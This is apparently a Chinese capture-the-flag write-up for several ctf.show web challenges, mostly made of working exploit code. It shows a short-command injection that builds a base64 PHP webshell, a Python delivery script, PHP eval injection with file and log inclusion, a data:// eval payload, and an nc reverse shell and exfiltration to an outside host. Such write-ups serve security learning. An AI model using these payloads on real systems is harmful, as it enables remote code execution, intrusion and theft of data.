web签到
查看源码
<form class="form-horizontal" role="form" action="api/tools.php" method="post" onsubmit="return check();" >
<div class="form-group">
<label for="command" class="col-lg-2 col-sm-2 control-label">命令</label>
<div class="col-lg-10">
<input onchange="help();" id="cmd" name="cmd" type="text" class="form-control" placeholder="ls">
<p id="help" class="help-block">仅支持较短命令执行,且不会回显。</p>
<script>
function help(){
if(isSafe($("#cmd").val())){
$("#help").css("color","#69cf56");
$("#help").html("提交命令执行");
}else{
$("#help").css("color","#ec1616");
$("#help").html("命令字符过长");
}
}
function isSafe(cmd)
{
return cmd.length<=7;
}
function check(){
if(isSafe($("#cmd").val())){
$("#help").css("color","#69cf56");
$("#help").html("提交命令执行");
return true;
}else{
$("#help").css("color","#ec1616");
$("#help").html("命令字符过长");
return false ;
}
}
</script>
直接访问api/tools.php,post提交cmd参数
cmd=ls />r
访问/api/r
下载到文件,内容为
bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
写入新的shell到api/1.php
poc如下
payload.txt
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0
import requests
import time
url = "http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/tools.php"
with open("payload.txt", "r") as f:
for i in f:
data = {"cmd": i.strip()}
r=requests.post(url=url,data=data)
time.sleep(1)
print(r.text)
test = requests.get("http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:
print("you've got it!")
访问/api/1.php执行命令拿到flag
也可以直接用nl命令
nl /*>m
easy_calc
<?php
if(check($code)){
eval('$result='."$code".";");
echo($result);
}
function check(&$code){
$num1=$_POST['num1'];
$symbol=$_POST['symbol'];
$num2=$_POST['num2'];
if(!isset($num1) || !isset($num2) || !isset($symbol) )
{
return false;
}
if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol))
{
return false;
}
if(preg_match("/^[\+\-\*\/]$/", $symbol))
{
$code = "$num1$symbol$num2";
return true;
}
return false;
}
POST /calc.php HTTP/1.1
Host: b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Content-Length: 24
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Referer: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=1&symbol=%2B&num2=3
最终执行命令的语句是 n u m 1 num1 num1symbol$num2 拼接起来的,而且过滤()不能调用函数,所以根据语言结构是 include、require、echo这种语句,试着去包含文件。
本地环境测试中
$num1='include "C:\Users\admin\Desktop\ip.txt";1';
$symbol="+";
$num2="2";
成功回显出ip.txt
num1=include "/etc/passwd";1&symbol=%2B&num2=2
成功回显出passwd
日志包含
num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2
最终流量包
POST /calc.php HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: <?php system('cat /*'); ?>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2
配合data伪协议执行代码
<?php eval($_GET[1]);
PD9waHAgZXZhbCgkX0dFVFsxXSk7
这里可以取消?>来避免编码末位的加号
payload
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
POST /calc.php?1=system('cat+/secret')%3b HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 88
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
easy_cmd
<?php
error_reporting(0);
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){
exec(escapeshellcmd($cmd));
}
?>
正则表达式要求提交的cmd以ping|ls|nc|ifconfig开头,然后进行escapeshellcmd处理
<?php
$cmd="nc -e /bin/bash ip port";
if(preg_match("/^\b(ping|ls|nc|ifconfig|ipconfig)\b/",$cmd))
{
$out=escapeshellcmd($cmd);
print_r($out);
}
nc -e /bin/bash ip port
这里发现escapeshellcmd并不会对命令造成修改
因此尝试用nc反弹shell
nc -e /bin/bash ip port
nc ip port -e /bin/bash
这里的shell连接后秒断开,尝试通过nc将命令结果外带出来
cmd=nc IP port -e ls /
cmd=nc IP port -e cat /secret
easy_sql
sql注入类,先跑下被waf的关键词,暂时没做出来